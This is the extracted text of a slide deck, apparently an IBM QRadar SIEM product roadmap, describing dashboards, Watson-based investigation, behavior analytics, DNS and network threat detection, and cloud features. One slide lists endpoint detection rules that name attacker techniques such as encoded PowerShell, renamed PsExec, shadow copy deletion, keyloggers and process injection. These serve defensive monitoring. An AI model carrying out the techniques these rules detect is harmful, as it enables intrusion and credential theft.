3. 3 IBM Security
Our Security Intelligence Strategy
Cloud
Customer
Success
Cognitive and
Analytics
• Security for the cloud
• QRoC and Cloud First
• 3rd Party Cloud
Deployment
• Hybrid Services
• Community
• Assistant
• UI Refresh and
Microservice
• Open data
• Watson Advisor
• User Behavior
• Model based analytics
• Endpoint, Cloud,
Network and User focus
4. 4
Event Correlation
and Log Management
IBM QRadar Security Intelligence
SIEM LAYER
Incident Response
Orchestration
Cognitive Security
Hunting
User and Entity Behavior
ABOVE THE SIEM
New Security Operations Tools
BELOW THE SIEM
Security Analytics require an integrated solution set
6. 6
Eco-System, App and Integration Builder
STREAMLING NEW DATA
INGESTION
• Supports simple and easy
ingestion and interpretation of
new data sources.
APP DEVELOPMENT
TOOL
• Real time QRadar App
editing and creating
• Create or Edit Apps easily
NEW
FREE QRADAR !
• 50EPS and 5K FPM
• Runs on a laptop
7. 7
QRadar Pulse – New Dashboards
• Predefined dashboards to get
started before you create one
of your own.
• Fine-tune display with
complete flexibility in
dashboard layout and
dashboard item refresh rates.
• Enlarge and pop out
dashboard items to display in
a multi-screen SOC.
• Create unique dashboards to
track endpoint, user, cloud,
department, and company-
wide security and operational
data.
• Stay informed with single
click drill-down to underlying
event, network, and alert data
• Import and export
dashboards to share with
colleagues.
• Create dashboard items that
use the full power of AQL.
NEW
8. 8
IBM QRadar Advisor with Watson
Advisor is quick to deploy and easy to consume
Delivered via IBM Security App Exchange, downloadable in minutes
Security Analytics
• Data correlation
• Pattern identification
• Anomaly detection
• Prioritization
• Data visualization
• Workflow
Watson for Cyber
Security
• Unstructured analysis
• Natural language
• Question and answer
• Machine learning
• Bias elimination
• Tradeoff analytics
Human Expertise
• Common sense
• Morals
• Compassion
• Abstraction
• Dilemmas
• Generalization
Watson
Advisor
• Local mining
• 2nd Stage ‘hunt’
• Route cause and
impact
presentation and
graph visualization
9. 9
New Administration and Operations Tools
BIRDS EYE VIEW OF SYSTEM
• EPS, Log source health, Expensive
Rules, Properties, I/O, Memory,
Notifications/Alerts, Stored Events,
and much more
• Deployment wide and per
appliance/node view
FAST INVESTIGATIONS
• Immediate visibility of configuration
changes, searches and other actions
• Understand correlation and impact of
configuration and data changes on
platform activity
• Audit trail of all user actions
NEW
10. 10
Deeper Endpoint Threat Detection
• Detected an Unquoted Service Binary Path with Spaces
• Detected a Service Binary Path Changed followed by a User or
Group Added
• Unsigned Executable Loaded Into Sensitive System Process
• Powershell Malicious Usage Detected with Encoded Command
• Powershell Malicious Usage Detected
• Powershell Script File Has Been Downloaded
• Process Started from Unusual Directories
• Process Loaded Executable from Temp Directory
• Detected PsExec with a Different Process Name
• Detected a Suspicious Svchost Process
• Detected Excessive Usage of System Tools From a Single Machine
• Shadow Copies Delete Detected
• Detected a Possible Keylogger
• Process Created a Thread Into Another Process
• Process Profiler: Process Name to Hash
• Process Profiler: Process Name to Parent Process
• System Process Started From Unusual Directory
• Abnormal Parent for a System Process
• Abnormal Parent for a Process
• Detected a Known Process Started With Unseen Hash
11. 11
QRadar Network Insights
Announcing NEW IBM QRadar Network Insights (QNI)
• Innovative network analytics solution that will
quickly and easily detect insider threats, data
exfiltration and malware activity
• Logs and network flow data not providing
enough visibility
• Records application activities, captures artifacts,
and identifies assets, applications and users
participating in network communications
• Configurable analysis from network traffic for
real time threat detection and long-term
retrospective analysis
• New Appliance with out-of-the-box App on the
App Exchange for fast time to value and best
practices
NEW
12. 12
Defending the DNS Attack Vector
Identification
• A new domain is observed via local
DNS queries observed by QNI
• DNS logs or DNS mirrored traffic
New Analytics
• QRadar domain analytics , including
DGA detection, tunneling detection,
beaconing, IP Flux, and whois
information
QRadar
DNS-based
Threat Detection
Extraction (250+ days) Publish
1 10 20 30 40 50
Conventional
Threat Intelligence
Hours of Visibility
Illuminate
13. 13
Securing the Cloud – Cloud Visibility (Q3 2018)
AWS
• Ingests CloudTrail,
CloudWatch, VPC Flow
logs, and S3 Bucket log
data from AWS
• Best practice threat and risk
management
AZURE
• Ingests Azure EventHub
data
• Single view of malicious
behaviors and risks
IBM Cloud
• Detect and prevent
common misconfigurations;
analyze and assess
security of cloud
deployments
14. 14 IBM Security
QRadar Advisor with Watson - Continued Innovation
• Automated and ad-hoc investigations
• Malware executed indicators, blocked and allowed
connections
• Extended threat investigation from Watson Insights
• Automated Watson Insight watchlist integration
• User Behavior Analytics and Asset insights
• Local threat intel
15. 15 IBM Security
QRadar UBA 3.0
STREAMLINED
INCIDENT
INVESTIGATIONS
• Multiple user watch lists
• New dashboard visuals
• Session based risk views
• Automated actions including
mgt review
SIMPLIFIED SETUP
• Use Case Wizard
• Streamline LDAP
Additional Use Cases
• Additional ML based use
cases
• Cloud, Source Code, Swift,
EPIC
UBA Dashboard with user role/title, color-coded
risk scores and sortable lists for recent and overall
risky users
Visual timeline chart that
shows normal and anomalous
user events by time
(month/weekday/hour/min)
UBA
Dashboard
with
multiple
customizab
le watchlist
NEW
16. 16
QRadar Data Store – Freeing the data
Data Store
• Need to store data for reporting,
search, investigation, audit,
compliance and/or analytics ?
• Don’t need correlation, behavior
analysis and offenses ?
• EPS licensing too expensive ?
Free the data
• Collect, parse, normalize and store
data
• No data volume license limit per
appliance or node
• Unlock the value with Search, Reports,
Dashboard and Apps**
• Simple, fixed, low cost per
appliance/node licensing
Data Store
IBM Security QRadar
** Excludes UBA, Cloud Discovery
You are in control
• Use existing deployment capacity
• No additional infrastructure mandated
• You define what data goes to data
store
• IP, CIDR, Log source, Expression
• Move data to Threat Detection function
(EPS license) when you need to
NEW
17. 17
Splunk App for QRadar
GET SPLUNK DATA INTO
QRADAR EASILY
• Easily utilize existing Splunk
collection infrastructure
• Forward logs from universal
and heavy forwarders
• All done via QRadar admin
screen to allow for easy
configuration
• Fast and Simple to deploy
and start forwarding logs
− Pick your data and where you
want to send it to
NEW
19. 19
Mitre Attack coming to QRadar (Q4 FY18)
• Structured approach and
evaluation of use case
coverage
• New use case
recommendation
engine*
• Simplified and consistent
views of offenses and
investigation
• Higher level analytics on
tactics trends and
patterns
20. 20
QRadar Assistant (2H 2018)
ENSURE QRADAR
DEPLOYMENT IS FULLY
OPTIMIZED AND EFFECTIVE
• Easily access useful info, use case, tech
tips, videos, learning academy etc.
• Call home
IDENTIFY NEW AND UPDATED
USE CASES
• Analyses QRadar environment (e.g.
data and apps) and recommends new
and updated apps and content packs
(use cases)
21. 21
QRadar Assistant - Tuning (Q4 2018)
ENSURE QRADAR IS
CONFIGURED CORRECTLY
• Network Hierarchy, building blocks,
server discovery
WIZARD TO HELP
TUNING
• Identify top firing rules
• Analyses select rules
and suggests
improvements
22. 22
QRadar Advisor 2.0
(2018 Q4)
• New summary
investigation insights
• Mitre Attack chain
analysis and
Visualization
• Root Cause and
Confidence Scoring
Mitre Attack
AnalysisKey threat and
risk factors
Mitre custom mapping
23. 23
QRadar Advisor 2.0 (2018 Q4) – Cross investigation Analytics
Related
offenses and
investigations
automatically
detected
24. 24
QRadar UBA – 2019 – 1H
AUTOMATED INSIGHTS
• Auto asset, user, app and
data discovery and
classification
• Asset based user view
• HR/Travel Integration for
leavers/travelers etc.
• Password vault integration
DEEPER INSIGHTS
• Sentiment Analysis
• Leaver prediction
• Training recommendations
Additional Use Cases
• Cloud, Source Code, Swift,
EPIC
UBA Dashboard with user role/title, color-coded
risk scores and sortable lists for recent and overall
risky users
Visual timeline chart that
shows normal and anomalous
user events by time
(month/weekday/hour/min)
25. 25
Machine Learning App– Enabling custom ML Models configs (2H 2019)
• Define your data
set
• Select the model
• Define the features
• Action and explore
the results!
• Utilizes the
machine learning
SPARK pipeline in
UBA and DNS
28. 28
QRadar on and for IaaS Platforms
Deploy QRadar
in Cloud
2H Available Q2 2018 Q2 2018 2H 2018
Marketplace 2H Q3 2018 Q3 2018 Q3 2018 2H 2018
App
2019
IaaS App
Q3 2018 Q3 2018
2019
IaaS App
2019
IaaS App
DSM Q1 2018 Available Available Q3 2018 Q4 2018
Content
Packs
2H Available
Q1 2018
• Azure Account
Config and
Access
Monitoring
• Office 365
Security Content
2H 2018 2H 2018
Internal Use Only
29. 29
QRadar ‘Cloud Burst’ (1H 2019)
CLOUD BASED STORAGE
• QRadar to forward data to an
elastic cloud S3 storage
• Open data format supported
by big data technologies and
Splunk
• Cost effective long term data
store
• Fast and simple to deploy
• Secure
• Cloud based data search
• Open access to data for
analytics
• Reduced IT infrastructure
and costs
Unified Search and Investigation
IBM Security
QRadar
On-Premise/QRoC Cloud Storage and Search 3rd Party
30. 30
QRadar ‘App Cloud’ (1H 2018)
CLOUD APP
DEPLOYMENT
• Simple click and deploy
QRadar apps into the cloud
• Simplified provisioning and
scaling
• Secure connection to on-
prem or QRoC Cloud
• Reduced IT infrastructure
and costs
• Hybrid migration path to
cloud for on-premise user
Unified view
IBM Security
QRadar
On-Premise/QRoC Cloud based Apps
31. 31
QRadar Roadmap Summary
• Threat Detection Use Cases and Apps across all domains of security operations
• Core architecture evolution to support cloud and next generation data center processes and
technologies
• Continued focus on 3rd party integrations and apps
• Improving consumability and supportability
COMPLIANCE
HUMAN
ERROR
SKILLS GAP
ADVANCED
ATTACKS
INNOVATION